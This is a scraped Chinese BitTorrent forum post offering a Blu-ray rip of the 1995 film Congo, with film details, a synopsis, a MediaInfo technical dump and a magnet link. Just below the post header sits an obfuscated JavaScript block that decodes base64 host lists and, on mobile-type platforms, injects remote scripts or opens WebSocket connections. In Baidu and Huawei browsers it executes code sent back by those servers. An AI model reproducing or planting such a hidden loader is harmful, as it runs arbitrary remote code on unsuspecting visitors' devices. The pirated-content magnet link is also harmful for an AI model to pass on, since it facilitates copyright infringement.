刚果惊魂[中文字幕]Congo.1995.1080p.BluRay.x264.DTS-迅雷下载 12.00GB

版主小s 2月前 289

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 刚果惊魂 / 刚果

◎片 名 Congo

◎年 代 1995

◎产 地 美国

◎类 别 动作 / 科幻 / 悬疑 / 冒险

◎语 言 英语

◎上映日期 1995-07-06

◎IMDb链接 https://www.imdb.com/title/tt0112715/

◎豆瓣评分 6.6/10 (2595人评价)

◎豆瓣链接 https://movie.douban.com/subject/1299284/

◎片 长 109 分钟

◎导 演 弗兰克·马歇尔 Frank Marshall (id:1049939)

◎编 剧 约翰·帕特里克·尚利 John Patrick Shanley (id:1027510)

迈克尔·克莱顿 Michael Crichton (id:1027340)

◎演 员 劳拉·琳妮 Laura Linney (id:1053572)

迪伦·沃尔什 Dylan Walsh (id:1040573)

蒂姆·克里 Tim Curry (id:1002686)

Christopher 'Critter' Antonucci Christopher 'Critter' Antonucci (id:1277307)

菲利普·丹 Philip Tan (id:1298892)

David St. Pierre David St. Pierre (id:1298220)

杰·卡普托 Jay Caputo (id:1280049)

罗密·罗斯蒙特 Romy Rosemont (id:1296055)

◎标 签 美国 / 冒险 / 科幻 / 惊悚 / 美国电影 / 1995 / 动作 / 恐怖

◎简 介

一家公司派人到刚果寻找纯度极高的钻石,并将发现进行卫星传送。但从寻像上看,那里似乎发生了突发事件,似乎还看到某种体形巨大的动物。公司只好继续派人到现场查明真相。灵长类动物学家彼得.埃利奥特带着艾美——一只8岁的大猩猩前往。但是,热带雨林是另一个天地,在那里主宰一切的可不是这些城市人的意志。这是一个表现人类和动物复杂关系的故事。影片借助电脑栩栩如生地表现了艾美的动作,情节惊险曲折,激动人心。

  1. General

  2. Unique ID : 69238492777553450548447233160406147834 (0x3416D9416B110BB6E92B19903218A2FA)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 12.0 GiB

  7. Duration : 1 h 48 min

  8. Overall bit rate : 15.9 Mb/s

  9. Encoded date : UTC 2021-07-08 04:45:47

  10. Writing application : mkvmerge v55.0.0 ('Waiting For Space') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 48 min

  22. Bit rate : 14.3 Mb/s

  23. Width : 1 920 pixels

  24. Height : 1 080 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.288

  33. Stream size : 10.8 GiB (90%)

  34. Writing library : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=34 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=19.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. ID in the original source medium : 4352 (0x1100)

  42. Format : DTS

  43. Format/Info : Digital Theater Systems

  44. Codec ID : A_DTS

  45. Duration : 1 h 48 min

  46. Bit rate mode : Constant

  47. Bit rate : 1 509 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : C L R Ls Rs LFE

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 93.750 FPS (512 SPF)

  52. Bit depth : 24 bits

  53. Compression mode : Lossy

  54. Stream size : 1.14 GiB (10%)

  55. Language : English

  56. Default : Yes

  57. Forced : No

  58. Original source medium : Blu-ray


  59. Text #1

  60. ID : 3

  61. ID in the original source medium : 4611 (0x1203)

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 38 min

  67. Bit rate : 13.9 kb/s

  68. Count of elements : 1336

  69. Stream size : 9.74 MiB (0%)

  70. Title : chs

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No

  74. Original source medium : Blu-ray


  75. Text #2

  76. ID : 4

  77. ID in the original source medium : 4612 (0x1204)

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 1 h 38 min

  83. Bit rate : 14.1 kb/s

  84. Count of elements : 1336

  85. Stream size : 9.88 MiB (0%)

  86. Title : cht

  87. Language : Chinese

  88. Default : No

  89. Forced : No

  90. Original source medium : Blu-ray


  91. Text #3

  92. ID : 5

  93. ID in the original source medium : 4608 (0x1200)

  94. Format : PGS

  95. Muxing mode : zlib

  96. Codec ID : S_HDMV/PGS

  97. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration : 1 h 46 min

  99. Bit rate : 28.7 kb/s

  100. Count of elements : 2218

  101. Stream size : 21.9 MiB (0%)

  102. Language : English

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Menu

  107. 00:00:00.000 : en:第 01 章

  108. 00:10:21.704 : en:第 02 章

  109. 00:16:42.793 : en:第 03 章

  110. 00:23:09.805 : en:第 04 章

  111. 00:30:14.145 : en:第 05 章

  112. 00:33:52.530 : en:第 06 章

  113. 00:43:04.999 : en:第 07 章

  114. 00:49:26.338 : en:第 08 章

  115. 00:55:16.521 : en:第 09 章

  116. 01:01:46.744 : en:第 10 章

  117. 01:07:10.192 : en:第 11 章

  118. 01:14:06.525 : en:第 12 章

  119. 01:21:36.141 : en:第 13 章

  120. 01:28:49.615 : en:第 14 章

  121. 01:34:25.493 : en:第 15 章

  122. 01:40:14.091 : en:第 16 章


TAGS 动作 冒险 悬疑 科幻

磁力链:
  • magnet:?xt=urn:btih:BEF517FEEDF454528B1207A3C6BE2C48B3E30709
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖